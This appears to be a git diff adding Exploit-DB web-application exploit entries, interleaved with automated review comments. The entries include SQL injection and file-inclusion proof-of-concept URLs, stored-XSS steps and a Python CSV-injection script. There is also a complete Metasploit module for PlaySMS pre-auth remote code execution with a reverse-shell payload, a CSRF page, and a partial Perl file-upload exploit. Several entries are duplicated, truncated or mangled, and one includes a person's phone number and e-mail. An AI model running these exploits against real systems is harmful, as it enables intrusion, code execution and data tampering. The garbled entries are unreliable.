+Line8: $results = mysql_query("DELETE from testdrive where bookingid ='$_GET[testid]'");
+Line11: if(isset($_GET['testbid']))
+Line13: $results = mysql_query("UPDATE testdrive SET status='Approved' where bookingid ='$_GET[testbid]'");
+Line16: if(isset($_GET['testbida']))
+Line:18: $results = mysql_query("UPDATE testdrive SET status='Rejected' where bookingid ='$_GET[testbida]'");
+
+=========
+POC:
+=========
+http://site.com/viewtestdrive.php?bookingid=[SQL]
\ No newline at end of file
diff --git a/exploits/php/webapps/48058.txt b/exploits/php/webapps/48058.txt
new file mode 100644
index 000000000..81f08de2d
--- /dev/null
+++ b/exploits/php/webapps/48058.txt
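Review bot: The title and the POC URL name `bookingid` as the injectable parameter, but the quoted source interpolates `$_GET['testid']`, `$_GET['testbid']` and `$_GET['testbida']`; `bookingid` is only the column in the WHERE clause. The report should list those three request parameters so the affected code can be located, and `# Data:` and `Vendor HomagePage` in the header are typos for `Date` and `Homepage`. On the fix side, all three statements need bound parameters, which the `mysql_query` API shown here does not offer, and they delete or update rows on a plain GET request.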
@@ -0,0 +1,39 @@
+# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
+# Author: mehran feizi
+# Category: webapps
+# Date: 2020-02-12
+# vendor home page: https://wordpress.org/plugins/tutor/
+
+===================================================================
+Vulnerable page:
+/instructors.php
+===================================================================
+Vulnerable Source:
+3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
+5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
+7: include include $include_file;
+requires:
+4: if(!empty($sub_page))
+6: if(file_exists($include_file))
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
+=================================================================================
+contact me:
+telegram: @MF0584
+gmail: mehranfeizi13841384@gmail.com
+===================================================================
+Vulnerable page:
+/instructors.php
+===================================================================
+Vulnerable Source:
+3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
+5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
+7: include include $include_file;
+requires:
+4: if(!empty($sub_page))
+6: if(file_exists($include_file))
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
+=================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48059.txt b/exploits/php/webapps/48059.txt
new file mode 100644
index 000000000..25198467a
--- /dev/null
+++ b/exploits/php/webapps/48059.txt
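Review bot: The advisory body is pasted twice: the block from `Vulnerable page:` to the `Exploit:` URL appears before the contact lines and again after them, so lines 25-39 of the new file repeat lines 7-21. I would drop the second copy and fix `# Tile:` to `# Title:`. The quoted source also shows that the included path is built as `views/pages/{$sub_page}.php` and gated by `file_exists`, a constraint the write-up does not mention, and `include include` looks like scanner output rather than the plugin's own code.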
@@ -0,0 +1,18 @@
+# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
+# Author: mehran feizi
+# Category: webapps
+# Date: 2020-02-12
+# vendor home page: https://wordpress.org/plugins/tutor/
+
+===================================================================
+Vulnerable page:
+/Quiz.php
+===================================================================
+Vulnerable Source:
+473: echo echo $topic_id;
+447: $topic_id = sanitize_text_field($_POST['topic_id']);
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/classes/Quiz.php
+$_POST('topic_id') =
+=================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48061.txt b/exploits/php/webapps/48061.txt
new file mode 100644
index 000000000..257c72a7f
--- /dev/null
+++ b/exploits/php/webapps/48061.txt
@@ -0,0 +1,14 @@
+# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
+# Author: mehran feizi
+# Category: webapps
+# Date: 2020-02-12
+# vendor home page: https://wordpress.org/plugins/wordfence/
+
+==============================================================================
+Vulnerable Source:
+5662: readfile readfile($localFile);
+5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
+=================================================================================
+Exploit:
+localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
+=================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48062.txt b/exploits/php/webapps/48062.txt
new file mode 100644
index 000000000..a14067976
--- /dev/null
+++ b/exploits/php/webapps/48062.txt
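Review bot: The two quoted lines of 48059.txt do not by themselves show an unsanitised sink: line 447 passes `$_POST['topic_id']` through `sanitize_text_field` before line 473 echoes it, and as rendered here the `Exploit:` section leaves the value after `$_POST('topic_id') =` empty. The report needs to show the output context at line 473 and explain why the issue is called persistent, since nothing quoted stores the value. `echo echo` and `# Tile:` look like tool output and a typo.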
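Review bot: 48061.txt quotes only the `readfile($localFile)` sink and the assignment at line 5645, without the enclosing function or any capability or nonce check around it, so the file-disclosure claim cannot be verified from the file as committed. The `Exploit:` URL requests `lib/wordfenceClass.php` directly, and the entry does not show that a class file does anything when loaded outside WordPress. I would add the function name and the privilege needed to reach it, and fix `# Tile:` and the doubled `readfile readfile`.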
@@ -0,0 +1,39 @@ +# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload +# Author: mehran feizi +# Category: webapps +# Date: 2020-02-11 +# vendor home page: https://wordpress.org/plugins/contact-form-7/ + +Vulnerable Source: +134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file)) +82: $file = $_FILES[$name] : null; +132: $new_file = path_join($uploads_dir, $filename); +122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); +121: $uploads_dir = wpcf7_upload_tmp_dir(); +131: $filename = wp_unique_filename($uploads_dir, $filename); +122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); +121: $uploads_dir = wpcf7_upload_tmp_dir(); +128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); +126: $filename = wpcf7_antiscript_file_name ($filename); +125: $filename = wpcf7_canonicalize ($filename, 'as-is'); +124: $filename = $file['name']; +82: $file = $_FILES[$name] : null; +82: $file = $_FILES[$name] : null; +78: ⇓ function wpcf7_file_validation_filter($result, $tag) + + +Exploit: +"@$shahab")); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$result = curl_exec($ch); +curl_close($ch); +print "$result"; +?> + +Location File: +http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg \ No newline at end of file diff --git a/exploits/php/webapps/48065.txt b/exploits/php/webapps/48065.txt new file mode 100644 index 000000000..b16e2319f --- /dev/null +++ b/exploits/php/webapps/48065.txt 
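Review bot: The `Vulnerable Source:` section is a data-flow trace, and the trace itself passes the file name through `wpcf7_canonicalize`, `wpcf7_antiscript_file_name`, `wp_unique_filename` and a directory from `wpcf7_maybe_add_random_dir` before `move_uploaded_file`. Nothing in the file explains why those steps fail to contain the upload, and the `Exploit:` block as rendered here is only the tail of a script. The entry should state which of these checks is insufficient and for which file type, or be labelled as an unverified scanner finding; `# Tile:` is a typo for `# Title:`.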
@@ -0,0 +1,19 @@
+# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
+# Author : mehran feizi
+# Vendor : https://wordpress.org/plugins/ultimate-member/
+# Category : Webapps
+# Date : 2020-02-11
+# Vendor home page: https://wordpress.org/plugins/ultimate-member/
+
+Vulnerable Page:
+/class-admin-upgrade.php
+
+
+Vulnerable Source:
+354: if(empty($_POST['pack'])) else
+356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';
+
+
+Exploit:
+localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
+$_POST('pack')=
\ No newline at end of file
diff --git a/exploits/php/webapps/48088.txt b/exploits/php/webapps/48088.txt
new file mode 100644
index 000000000..ac29788ea
--- /dev/null
+++ b/exploits/php/webapps/48088.txt
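Review bot: Line 356 of the quoted source concatenates `$_POST['pack']` straight into an `include_once` path, but the report omits the enclosing method and whether a capability or nonce check precedes it, which decides who can reach the code. The `Exploit:` path contains `worprees plugin bug dar/`, which reads like a directory from the author's machine rather than part of the plugin path, and the value after `$_POST('pack')=` is empty. The remediation worth documenting is checking `pack` against the directory names that actually exist under `packages_dir` before including `init.php`.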
@@ -0,0 +1,29 @@ +# Exploit Title: Wordpress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting +# Date: 2020-02-15 +# Exploit Author: Shahab.ra.9 +# Vendor Homepage: https://products-filter.com/ +# Software Link: https://wordpress.org/plugins/woocommerce-products-filter/ +# Version: 1.2.3 +# Tested on: windows 10 +# WOOF - Products Filter for WooCommerce + +Exploit: +http://target/wp-admin/admin.php?page=wc-settings&tab=woof + +now in tab "design" -> then enter (xss code) in the (textfields) front side +->(Text for block toggle ,Text for block toggle , Custom front css styles +file link). +then click on button "save changes". +then refresh page ,now you see the execution of xss code ,then refersh +frontend page site -> "http://target/shop/ " or frontend pages used this +plugin the execution of xss code. + +Demo Poc: + +http://target/wp-admin/admin.php?page=wc-settings&tab=woof + +now in tab "design" -> then enter ( "; + + +.:: Post Request ::. +option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes \ No newline at end of file diff --git a/exploits/php/webapps/48198.txt b/exploits/php/webapps/48198.txt new file mode 100644 index 000000000..9b03087d5 --- /dev/null +++ b/exploits/php/webapps/48198.txt 
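Review bot: Every step here starts from `wp-admin/admin.php?page=wc-settings&tab=woof`, so the stored script can only be planted by an account that is already allowed to change WooCommerce settings, and the header does not say so. I would add a line such as `# Privileges required: authenticated user with access to WooCommerce settings` so the severity is not read as unauthenticated. The field list also names `Text for block toggle` twice, which looks like a copy error for a second field.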
@@ -0,0 +1,43 @@
+#!/usr/bin/python3
+
+# Exploit Title: Joomla 3.9.0 < 3.9.7 - CSV Injection
+# Date: 2020-03-10
+# Vulnerability Authors: Jose Antonio Rodriguez Garcia and Phil Keeble (MWR InfoSecurity)
+# Exploit Author: Abdullah - @i4bdullah
+# Vendor Homepage: https://www.joomla.org/
+# Software Link: https://downloads.joomla.org/cms/joomla3/3-9-5/Joomla_3-9-5-Stable-Full_Package.zip?format=zip
+# Version: 3.9.0 < 3.9.7
+# Tested on: Ubuntu 18.04 LTS and Windows 7
+# CVE : CVE-2019-12765
+
+import mechanize
+import sys
+
+if (len(sys.argv) != 2):
+ print(f'Usage: {sys.argv[0]} ')
+ print(f'Example: {sys.argv[0]} http://127.0.0.1 ')
+ sys.exit(1)
+
+base_url = sys.argv[1]
+reg_url = f"{base_url}/joomla/index.php/component/users/?view=registration&Itemid=101"
+login_url = f"{base_url}/joomla/index.php?option=com_users"
+
+def pwn(username='abdullah'):
+ payload = "=cmd|'/c calc.exe'!A1"
+ print(f"Registering a new user with the name <{payload}>...")
+ reg_form = mechanize.Browser()
+ reg_form.set_handle_robots(False)
+ reg_form.open(reg_url)
+ reg_form.select_form(nr=0)
+ reg_form.form['jform[name]'] = payload
+ reg_form.form['jform[username]'] = username
+ reg_form.form['jform[password1]'] = 'password'
+ reg_form.form['jform[password2]'] = 'password'
+ reg_form.form['jform[email1]'] = 'whatever@i4bdullah.com'
+ reg_form.form['jform[email2]'] = 'whatever@i4bdullah.com'
+ reg_form.submit()
+ print("The exploit ran successfully.")
+ print("Exiting...")
+ sys.exit(0)
+
+pwn()
\ No newline at end of file
diff --git a/exploits/php/webapps/48199.txt b/exploits/php/webapps/48199.txt
new file mode 100644
index 000000000..30288fce2
--- /dev/null
+++ b/exploits/php/webapps/48199.txt
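Review bot: The header explains neither where the injected name is later exported nor what the fix is, although the version field `3.9.0 < 3.9.7` implies 3.9.7 as the fixed release. A formula stored in `jform[name]` is inert in the web interface; it matters only once the value is written to a CSV that someone opens in a spreadsheet, presumably an administrator export, and the entry should say so. The file is also a Python script with a `#!/usr/bin/python3` line committed as `48198.txt`, and `login_url` is assigned but never used.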
@@ -0,0 +1,189 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code +Execution', + 'Description' => %q{ + This module exploits a Preauth Server-Side Template Injection +leads remote code execution vulnerability in PlaySMS Before Version 1.4.3. + This issue is caused by Double processes a server-side template +by Custom PHP Template system called 'TPL'. + which is used in PlaySMS template engine location +src/Playsms/Tpl.php:_compile(). When Attacker supply username with a +malicious payload + and submit. This malicious payload first process by TPL and +save the value in the current template after this value goes for the second +process + which result in code execution. + The TPL(https://github.com/antonraharja/tpl) template language +is vulnerable to PHP code injection. + + This module was tested against PlaySMS 1.4 on HackTheBox's +Forlic Machine. 
+ }, + 'Author' => + [ + 'Touhid M.Shaikh ', # Metasploit +Module + 'Lucas Rosevear' # Found and Initial PoC by NCC Groupd + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE','2020-8644'], + ['URL',' +https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ +'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'cmd/unix/reverse_python' + }, + 'Privileged' => false, + 'Platform' => %w[unix linux], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'python' + } + }, + 'Targets' => + [ + [ 'PlaySMS Before 1.4.3', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 05 2020')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Base playsms directory path", +'/']), + ]) + end + + def uri + return target_uri.path + end + + def check + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php') + }) + rescue + vprint_error('Unable to access the index.php file') + return CheckCode::Unknown + end + + if res.code == 302 && +res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login') + return Exploit::CheckCode::Appears + end + + return CheckCode::Safe + end + + #Send Payload in Login Request + def login + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + } + }) + + # Grabbing CSRF token from body + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine +CSRF token") if csrf.nil? + vprint_good("X-CSRF-Token for login : #{csrf}") + + cookies = res.get_cookies + + vprint_status('Trying to Send Payload in Username Field ......') + + #Encoded in base64 to avoid HTML TAGS which is filter by Application. 
+ evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64 +-d |sh`}}" + + # Send Payload with cookies. + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + 'op' => 'login', + }.to_a.shuffle], + 'vars_post' => Hash[{ + 'X-CSRF-Token' => csrf, + 'username' => evil, + 'password' => '' + }.to_a.shuffle], + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to +Login request") if res.nil? + + # Request Status Check + if res.code == 302 + print_good("Payload successfully Sent") + return cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Something Goes +Wrong") + end + end + + def exploit + cookies = login + vprint_status("Cookies here : #{cookies}") + # Execute Last Sent Username. + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'cookie' => cookies, + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + } + }) + end +end + +-- +Touhid Shaikh +Exploit Researcher and Developer | Security Consultant +m: +91 7738794435 +e: touhidshaikh22@gmail.com +www.touhidshaikh.com [image: Facebook icon] + [image: LinkedIn icon] + [image: Twitter icon] + [image: Youtube icon] + + +The content of this email is confidential and intended for the recipient +specified in message only. It is strictly forbidden to share any part of +this message with any third party, without a written consent of the sender. +If you received this message by mistake, please reply to this message and +follow with its deletion, so that we can ensure such a mistake does not +occur in the future. \ No newline at end of file diff --git a/exploits/php/webapps/48200.txt b/exploits/php/webapps/48200.txt new file mode 100644 index 000000000..be798f8ef --- /dev/null +++ b/exploits/php/webapps/48200.txt 
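Review bot: The new file ends with the submitter's e-mail signature, including a phone number and a confidentiality notice that forbids sharing the message, after the module's final `end`. None of that belongs in a published module file, and the notice contradicts publishing it, so everything from the `--` line down should be removed. The mail client's line wrapping has also split several lines, for example the `# Metasploit` comment whose continuation leaves a bare `Module` token on its own line, so the entry should be taken from the original source file rather than from the e-mail body. The description says `PlaySMS Before Version 1.4.3` while the module name says `PlaySMS 1.4.3`, and the two should agree.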
@@ -0,0 +1,319 @@ +# Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation +# Date: 2020-03-10 +# Exploit Author: Dhiraj Mishra +# Vendor Homepage: https://www.wftpserver.com +# Version: v6.2.6 +# Tested on: Windows 10 + +*Summary:* +An authenticated CSRF exists in web client and web administration of Wing +FTP v6.2.6, a crafted HTML page could delete admin user from the +application where as administration needs to re-install the program and add +admin user again. Issue was patched in v6.2.7. + +*Proof of concept:* + + + +
+ + + +
+ + + +*Patch (lua/cgiadmin.lua):* +URL: https://www.wftpserver.com/serverhistory.htm + +local outfunc = "echo" + +local function out (s, i, f) +s = string.sub(s, i, f or -1) +if s == "" then return s end +s = string.gsub(s, "([\\\n\'])", "\\%1") +s = string.gsub(s, "\r", "\\r") +return string.format(" %s('%s'); ", outfunc, s) +end + +local function translate (s) +s = string.gsub(s, "<%%(.-)%%>", "") +local res = {} +local start = 1 +while true do +local ip, fp, target, exp, code = string.find(s, "<%?%?(%w*)[ +\t]*(=?)(.-)%?%?>", start) +if not ip then break end +table.insert(res, out(s, start, ip-1)) +if target ~= "" and target ~= "lua" then +table.insert(res, out(s, ip, fp)) +else +if exp == "=" then +table.insert(res, string.format(" %s(%s);", outfunc, code)) +else +table.insert(res, string.format(" %s ", code)) +end +end +start = fp + 1 +end +table.insert(res, out(s, start)) +return table.concat(res) +end + +local function compile (src, chunkname) +return loadstring(translate(src),chunkname) +end + +function include (filename, env) +if incfiles[filename] == nil then +incfiles[filename] = true; +path = c_GetAppPath() +path = path .. 
"/webadmin/"..filename +local errstr = string.format("The page '%s' does not +exist!",filename) +local fh,_ = io.open (path) +if not fh then +echo_out = echo_out..errstr +return +end +local src = fh:read("*a") +fh:close() +local prog = compile(src, path) + +local _env +if env then +_env = getfenv (prog) +setfenv (prog, env) +end + +local status,err = pcall(prog) +if not status then +if type(err) == "string" and not string.find(err,"exit function!") then +print(string.format("some error in %s!",err)) +end +return +end +end +end + +function var_dump(var) +print("{") +if type(var) == "string" or type(var) == "number" or type(var) == "boolean" +or type(var) == "function" then +print(var) +elseif(type(var) == "thread") then +print("thread") +elseif(type(var) == "userdata") then +print("userdata") +elseif type(var) == "nil" then +print("nil") +elseif type(var) == "table" then +for k,v in pairs(var) do +if type(k) == "string" then k="'"..k.."'" end +if(type(v) == "string") then +print(k.."=>'"..v.."',") +elseif(type(v) == "number" or type(v) == "boolean") then +print(k.."=>"..tostring(v)..",") +elseif(type(v) == "function") then +print(k.."=>function,") +elseif(type(v) == "thread") then +print(k.."=>thread,") +elseif(type(v) == "userdata") then +print(k.."=>userdata,") +elseif(type(v) == "nil") then +print(k.."=>nil,") +elseif(type(v) == "table") then +print(k.."=>table,") +else +print(k.."=>object,") +end +end +else +print("object") +end +print("}") +end + +function init_get() +local MatchedReferer = true +if _SESSION_ID ~= nil then +local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)") +if Referer ~= nil and Referer ~= "" then +local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)") +if Host ~= nil and Host ~= "" then +if string.sub(Referer,8,string.len(Host)+7) == Host or +string.sub(Referer,9,string.len(Host)+8) == Host then +MatchedReferer = true +else +MatchedReferer = false +exit() +end +end +else +MatchedReferer = false +end +end + +string.gsub 
(urlparam, "([^&=]+)=([^&=]*)&?", +function (key, val) +if key == "domain" then +if MatchedReferer == true then +rawset(_GET,key,val) +else +rawset(_GET,key,specialhtml_encode(val)) +end +else +if MatchedReferer == true then +rawset(_GET,unescape(key),unescape(val)) +else +--rawset(_GET,unescape(key),specialhtml_encode(unescape(val))) +end +end +end +) +end + +function init_post() +local MatchedReferer = true +if _SESSION_ID ~= nil then +local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)") +if Referer ~= nil and Referer ~= "" then +local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)") +if Host ~= nil and Host ~= "" then +if string.sub(Referer,8,string.len(Host)+7) == Host or +string.sub(Referer,9,string.len(Host)+8) == Host then +MatchedReferer = true +else +MatchedReferer = false +exit() +end +end +else +MatchedReferer = false +end +end + +if +string.find(strHead,"[cC]ontent%-[tT]ype:%s?multipart/form%-data;%s?boundary=") +then +string.gsub (strContent, +"[cC]ontent%-[dD]isposition:%s?form%-data;%s?name=\"([^\"\r\n]*)\"\r\n\r\n([^\r\n]*)\r\n", +function (key, val) +if key == "domain" then +if MatchedReferer == true then +rawset(_POST,key,val) +else +rawset(_POST,key,specialhtml_encode(val)) +end +else +if MatchedReferer == true then +rawset(_POST,unescape(key),unescape(val)) +else +--rawset(_POST,unescape(key),specialhtml_encode(unescape(val))) +end +end +end +) +else +string.gsub (strContent, "([^&=\r\n]+)=([^&=\r\n]*)&?", +function (key, val) +if key == "domain" then +if MatchedReferer == true then +rawset(_POST,key,val) +else +rawset(_POST,key,specialhtml_encode(val)) +end +else +if MatchedReferer == true then +rawset(_POST,unescape(key),unescape(val)) +else +--rawset(_POST,unescape(key),specialhtml_encode(unescape(val))) +end +end +end +) +end +end + +function init_session() +if _COOKIE["UIDADMIN"] ~= nil then +_SESSION_ID = _COOKIE["UIDADMIN"] +SessionModule.load(_SESSION_ID) +end +end + +function init_cookie() +local cookiestr = 
string.match(strHead,"[cC]ookie:%s?(%s[^\r\n]*)") +if cookiestr == nil or cookiestr == "" then return end +string.gsub (cookiestr, "([^%s;=]+)=([^;=]*)[;%s]?", +function (key, val) +rawset(_COOKIE,unescape(key),unescape(val)) +end +) +end + +function setcookie(name,value,expire_secs) +if name == "UIDADMIN" then return end +local expiretime = os.date("!%A, %d-%b-%Y %H:%M:%S GMT", +os.time()+3600*24*365) +_SETCOOKIE = _SETCOOKIE.."Set-Cookie: "..name.."="..value.."; +expires="..expiretime.."\r\n" +rawset(_COOKIE,name,value) +end + +function getcookie(name) +if name == "UIDADMIN" then return end +return _COOKIE[name] +end + +function deletecookie(name) +setcookie(name,"",-10000000) +end + +function deleteallcookies() +for name,_ in pairs(_COOKIE) do +deletecookie(name) +end +end + +local cookie_metatable = +{ +__newindex = function(t,k,v) +setcookie(k,v,360000) +end +} +setmetatable(_COOKIE,cookie_metatable) + +session_metatable = +{ +__newindex = function(t,k,v) +if type(v) ~= "table" then +if k ~= nil then +k = string.gsub(k,"'","") +k = string.gsub(k,"\"","") +end +if v ~= nil then +--v = string.gsub(v,"%[","") +--v = string.gsub(v,"%]","") +end +rawset(_SESSION,k,v) +SessionModule.save(_SESSION_ID) +end +end +} +--setmetatable(_SESSION,session_metatable) + +function init_all() +init_cookie() +init_session() +init_get() +init_post() +end + +function setContentType(typestr) +_CONTENTTYPE = typestr +end + +function exit() +error("exit function!") +end \ No newline at end of file diff --git a/exploits/php/webapps/48213.txt b/exploits/php/webapps/48213.txt new file mode 100644 index 000000000..f290e7347 --- /dev/null +++ b/exploits/php/webapps/48213.txt 
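Review bot: In the code pasted under `Patch`, the Referer check in `init_get` and `init_post` compares only the first `string.len(Host)` characters after the scheme with `Host`, so it verifies a prefix rather than the whole authority, and it leaves `MatchedReferer` true when the `Host` header is missing. A same-origin test should also require that the character following the host is `/` or the end of the string, and a per-session token in each state-changing form is a stronger control than a Referer comparison. Separately, the title says `6.2.3 - Privilege Escalation` while the header and summary say v6.2.6 and describe a CSRF fixed in v6.2.7, so the title should be brought in line with them.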
@@ -0,0 +1,23 @@ +# Exploit Title: Wordpress Plugin Custom Searchable Data System - +Unauthenticated Data modification +# Date: 13 March 2020 +# Exploit Author: Nawaf Alkeraithe +# Vendor Homepage: +https://wordpress.org/plugins/custom-searchable-data-entry-system/ +# Software Link: +https://wordpress.org/plugins/custom-searchable-data-entry-system/ +# Version: 1.7.1 + +Plugin fails to perform authorization check to delete/add/edit data entries. + +PoC (delete entry): +GET /wordpress/wp-admin/admin.php?page=sds-form-entries&sds-del-entry-first-entry-id=[ENTRY +ID1]&sds-del-entry-last-entry-id=[ENTRY +ID2]&sds-del-entry-table-row=wp_ghazale_sds_newtest_inputs + +Note: plugin is not maintained now, either remove it, or apply the +authorization check to all actions. + +Special thanks to *Wordfence and Sean Murphy! +(https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/ +)* \ No newline at end of file diff --git a/exploits/php/webapps/48222.txt b/exploits/php/webapps/48222.txt new file mode 100644 index 000000000..a3a00b1a0 --- /dev/null +++ b/exploits/php/webapps/48222.txt @@ -0,0 +1,32 @@ +# Exploit Title: UADMIN Botnet 1.0 - 'link' SQL Injection +# Google Dork: n/a +# Date: 2020-03-16 +# Exploit Author: n4pst3r +# Vendor Homepage: unkn0wn +# Software Link: unkn0wn +# Version: unkn0wn +# Tested on: Windows 10, Kali +# CVE : n/a +################################ +# Vuln-Code: download.php + +$link=$_GET['link']; +$agent=esc__($_SERVER['HTTP_USER_AGENT']); + +if(isset($_GET['botid'])){ + $botid=esc__($_GET['botid']); +}else{ + $botid='unknown'; +}; + +################################ +Attack Response & PoC: + +--- +Parameter: link (GET) + Type: time-based blind + Title: SQLite > 2.0 OR time-based blind (heavy query) + Payload: link=1' OR 7990=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- nwGY +--- + +http://127.0.0.1/ush/gates/token.php?link=1 \ No newline at end of file 
diff --git a/exploits/php/webapps/48230.txt b/exploits/php/webapps/48230.txt
new file mode 100644
index 000000000..a3569d988
--- /dev/null
+++ b/exploits/php/webapps/48230.txt
@@ -0,0 +1,191 @@ +# Exploit Title: Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload +# Google Dork: inurl:"index.php?option=com_acym" +# Date: 2020-03-16 +# Exploit Author: qw3rTyTy +# Vendor Homepage: https://www.acyba.com/ +# Software Link: https://www.acyba.com/acymailing/download.html +# Version: v6.9.1 Starter +# Tested on: Joomla! v3.9.0 +# CVE: N/A + + +######################################################################################## +#Analysis of vulnerability +######################################################################################## +Vulnerable code is in MailsController::setNewIconShare() in file "back/controllers/mails.php". + +[BEGIN_CODE] + 600 public function setNewIconShare() + 601 { + 602 $socialName = acym_getVar('string', 'social', ''); + 603 $extension = pathinfo($_FILES['file']['name']); + 604 $newPath = ACYM_UPLOAD_FOLDER.'socials'.DS.$socialName; + 605 $newPathComplete = $newPath.'.'.$extension['extension']; + 606 //There code is no checking CSRF token, no sanitizing, and authentication. + 607 if (!acym_uploadFile($_FILES['file']['tmp_name'], ACYM_ROOT.$newPathComplete) || empty($socialName)) { //!!! 
+ 608 echo 'error'; + 609 exit; + 610 } + 611 + 612 $newConfig = new stdClass(); + 613 $newConfig->social_icons = json_decode($this->config->get('social_icons', '{}'), true); + 614 + 615 $newImg = acym_rootURI().$newPathComplete; + 616 $newImgWithoutExtension = acym_rootURI().$newPath; + 617 + 618 $newConfig->social_icons[$socialName] = $newImg; + 619 $newConfig->social_icons = json_encode($newConfig->social_icons); + 620 $this->config->save($newConfig); + 621 + 622 echo json_encode( + 623 [ + 624 'url' => $newImgWithoutExtension, + 625 'extension' => $extension['extension'], + 626 ] + 627 ); + 628 exit; + 629 } + +function acym_uploadFile($src, $dest) +{ + $dest = acym_cleanPath($dest); + + $baseDir = dirname($dest); + if (!file_exists($baseDir)) { + acym_createFolder($baseDir); + } + + if (is_writeable($baseDir) && move_uploaded_file($src, $dest)) {//!!! + if (@chmod($dest, octdec('0644'))) { + return true; + } else { + acym_enqueueMessage(acym_translation('ACYM_FILE_REJECTED_SAFETY_REASON'), 'error'); + } + } else { + acym_enqueueMessage(acym_translation_sprintf('ACYM_COULD_NOT_UPLOAD_FILE_PERMISSION', $baseDir), 'error'); + } + + return false; +} +[END_CODE] + +######################################################################################## +#Exploit +######################################################################################## +#!/usr/bin/perl +# +#$> perl ./exploit.pl "http://127.0.0.1/joomla" "lolz" /tmp/lolz.php +use strict; +use warnings; +use LWP::UserAgent; +use JSON(qw/decode_json/); +######################################################################################## +sub print_usage_and_exit +{ + print("*** com_acym Arbitrary File Upload exploit\n"); + print("Usage: $0 \n"); + print("\n"); + + exit(); +} + +sub fetch_useragent +{ + my @available_useragents = ( + "gertrud barkhorn", + "erica hartmann", + "eila ilmatar juutilainen", + ); + + return($available_useragents[(rand(scalar(@available_useragents)))]); +} + +sub 
